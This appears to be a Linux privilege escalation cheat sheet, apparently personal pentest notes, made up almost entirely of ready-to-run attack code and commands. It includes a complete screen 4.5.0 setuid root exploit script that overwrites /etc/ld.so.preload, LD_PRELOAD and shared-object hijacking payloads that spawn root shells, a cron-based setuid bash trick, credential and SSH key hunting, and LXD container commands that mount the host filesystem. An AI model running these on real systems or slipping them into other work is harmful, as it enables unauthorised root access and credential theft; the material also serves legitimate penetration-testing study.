Links
Comment on page

Linux Privilege Escalation

Kernel Exploits

Enumeration

# Check Linux OS Versino
uname -a
Exploit if the version is vulnerable

Vulnerable Services (Screen)

# Check Version
screen -v

Exploit Script

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c -Wno-implicit-function-declaration
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

Cron Job Abuse

Enumeration

# Find Write Able Files
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
https://github.com/DominicBreuker/pspy

Exploitation

# Add
chmod u+s /bin/bash

Special Permissions

Setuid Bit

# Find Setuid
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# Find Setgid
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

Path Abuse

PATH is an environment variable that specifies the set of directories where an executable can be located.
# Add Current Directory to Path
PATH=.:${PATH}
export PATH
# Verify Path
echo $PATH

Credentials Hunting

# Enumerate Spool / Mail Directory for Creds
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
# SSH Keys
ls ~/.ssh

Shared Libraries

# Check Shared Libaries
ldd /bin/ls
# Abuse LD_PRELOAD
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
# Compile
gcc -fPIC -shared -o root.so root.c -nostartfiles
# Run Sudo
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart

Shared Object Hijacking

# Check Shared Libraries
ldd <bin>
# Check Load Location
readelf -d <bin> | grep PATH
# Malicous Library
#include<stdio.h>
#include<stdlib.h>
void dbquery() {
printf("Malicious library loaded\n");
setuid(0);
system("/bin/sh -p");
}
# Compile
gcc root.c -fPIC -shared -o /development/libshared.so

Privileged Groups

# Check Group
id
# if LXD is inside the group
# Import Image
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
# Start Privileged Container
lxc init alpine r00t -c security.privileged=true
# Mount Host
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
# Start Container
lxc start r00t
# Get Shell
lxc exec r00t /bin/sh